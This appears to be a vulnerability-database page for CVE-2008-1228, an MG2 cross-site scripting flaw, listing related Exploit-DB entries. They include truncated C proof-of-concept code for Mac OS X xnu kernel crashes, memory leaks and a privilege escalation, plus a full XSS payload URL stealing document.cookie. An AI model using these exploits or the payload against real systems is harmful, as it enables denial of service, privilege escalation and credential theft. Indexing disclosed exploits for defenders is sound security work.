CVE-2008-1228
Published: 2008-03-10
Priority P4 · 16 · medium · 4.3 CVSS 2.0
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.19% (64.0th percentile)
Cross-site scripting (XSS) vulnerability in admin.php in MG2 (formerly Minigal) allows remote attackers to inject arbitrary web script or HTML via the list parameter in an import action.
No detection rules found.
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
---
/* xnu-macfsstat-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a)
#define LEAK_MACBYTES(a) (sizeof (int)*a)
struct __mac_getfsstat {
char *buf; char _pad[4];
int bufsize; char __pad[4];
char *mac; char ___pad[4];
int macsize; char ____pad[4];
int flags; char _____pad[4];
};
int
main (int argc, char **argv)
{
struct __mac_getfsstat req;
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
memset (&req, 0, sizeof req);
req.buf = (char *) 0xDEADBEEF;
req.bufsize = LEAK_BUFBYTES (65536 * 64);
req.mac = (char *) 0xDEADBEEF;
req.macsize
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
---
/* xnu-profil-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
/* profil defines */
#define PROFIL_LEAK_NUM 65536 * 128
int
main (int argc, char **argv)
{
char buf[1024];
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
printf ("* opening profil, pid: %d...", getpid ());
if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0)
{
fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n",
argv[0], n);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32);
fflush (stdout);
for (i = 0; i < PROFIL_LEAK_NUM; i++)
{
if ((n = syscall (SYS_
Exploit-DB
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1238 Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
---
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating ham
Exploit-DB
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
exploitdb·2009-03-23
CVE-2009-1235 Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
---
#!/bin/bash
# * xnu-hfs-fcntl-v2.sh
# *
# * Copyright (c) 2008 by
# *
# * Apple MACOS X 792.0 \n" \
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"
if [ ! -f $EXPFILE ]; then
echo -n "* compiling exploit..."
gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
if [ ! -f $IMAGE.dmg ]; then
echo -n "* creating diskimage..."
hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
echo -e "* executing exploit...\n"
./$E
Exploit-DB
MG2 - 'list' Cross-Site Scripting
exploitdb·2008-03-04
CVE-2008-1228 MG2 - 'list' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/28098/info
MG2 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)
exploitdb·2008-02-26·CVSS 7.8
CVE-2008-0177 [HIGH] Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)
---
/* xnu-ipv6-ipcomp.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu md typo?).
*
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!m) {
* ->
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!md) {
* (bsd/netinet6/ipcomp_input.c)
*
* curiously the same bug exists in ipcomp4_input, but an explicit
* check is made to ensure there is enough space for the struct ipcomp.
*
* Note: bug independently found by Shoichi Sakane of the KAME project.
* (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
* (http://www.kb.cert.org/vuls/id/110947)
* (https://www.securityfocus.com/bid/27642)
* (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://w
No writeups or analysis indexed.
Published: 2008-03-10